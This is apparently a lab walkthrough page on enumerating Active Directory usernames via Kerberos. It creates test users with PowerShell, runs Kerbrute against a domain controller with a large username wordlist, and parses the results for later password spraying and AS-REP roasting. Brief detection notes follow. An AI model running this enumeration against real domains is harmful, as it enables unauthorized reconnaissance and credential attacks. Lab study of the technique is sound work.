Username Enumeration

It is possible to enumerate valid usernames without authentication by sending TGT requests with no pre-authentication.

Configuring

  1. To implement the attack we need to create a couple users with easy guessable usernames. To do this we can choose some usernames from a popular list of usernames from the SecLists repository. We will create the following users:

john
david
robert
chris
mike
dave
richard
thomas
steve
mark

Creating users

2. Previously we created users by using the GUI. Now we will create users using PowerShell. Create the file users.txt and place the usernames in there. Then create the users:

# Place users in users.txt
cd C:\
notepad users.txt

# Creating users
$password = ConvertTo-SecureString 'ReallySecurePassword123!' -AsPlainText -Force
$files = Get-Content -Path C:\users.txt
ForEach ($name in $files) {
New-ADUser -Name "$name" -GivenName "$name" -SamAccountName "$name" -UserPrincipalName $name@amsterdam.bank.local -Path "OU=Employees,DC=amsterdan,DC=bank,DC=local" -AccountPassword $password -Enabled $true
}

3. Run the command below to get a list of all the users and check if the users are created:

Get-ADUser -Filter * | Select-Object Name

Attacking

How it works

To enumerate usernames, send TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists.

Source: https://github.com/ropnop/kerbrute#user-enumeration__

Executing the attack

  1. To enumerate usernames we can use the tool Kerbrute. To install Kerbrute on Kali download the latest release from GitHub and save it somewhere. I would recommend /opt.

2. For the list of usernames download the xato-net-10-million-usernames.txt list from SecLists.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt

3. After downloading the tool and the username list run Kerbrute against the domain amsterdam.bank.local and DC 10.0.0.3. Pipe the command to tee to save the output to the txt file username_enum.txt. 

./kerbrute_linux_amd64 userenum -d amsterdam.bank.local --dc 10.0.0.3 xato-net-10-million-usernames.txt | tee username_enum.txt

These valid users can be used for AS-REP roasting or Password Spraying Attacks. For now save these users to usernames.txt.

4. To only get a list of usernames execute the following which will cut the output to only get the usernames, changes everything to lowercase and sorting for unique entries:

cat username_enum.txt | grep bank.local | cut -d " " -f 8- | cut -d "@" -f 1 | sed 's/./\L&/g' | sort -u > users.txt

cat users.txt                                                                                                       
administrator
bank
chris
dave
david
john
mark
mike
richard
robert
steve
thomas

5. From here we can execute the following attacks to gain access to the domain:

Password SprayingEmpty PasswordAS-REP Roasting

Defending

Recommendations

  • I don't know any configurations to block the enumeration of usernames. The best way to block this is using a non traditional naming convention for the samaccountnames.

Detection

The attack generates the Windows event ID 4768 "A Kerberos authentication ticket (TGT) was requested" if Kerberos logging is enabled.

Work in Progress

References

LogoGitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.GitHub
LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub
PreviousInitial Access AttacksNextPassword Spraying

Last updated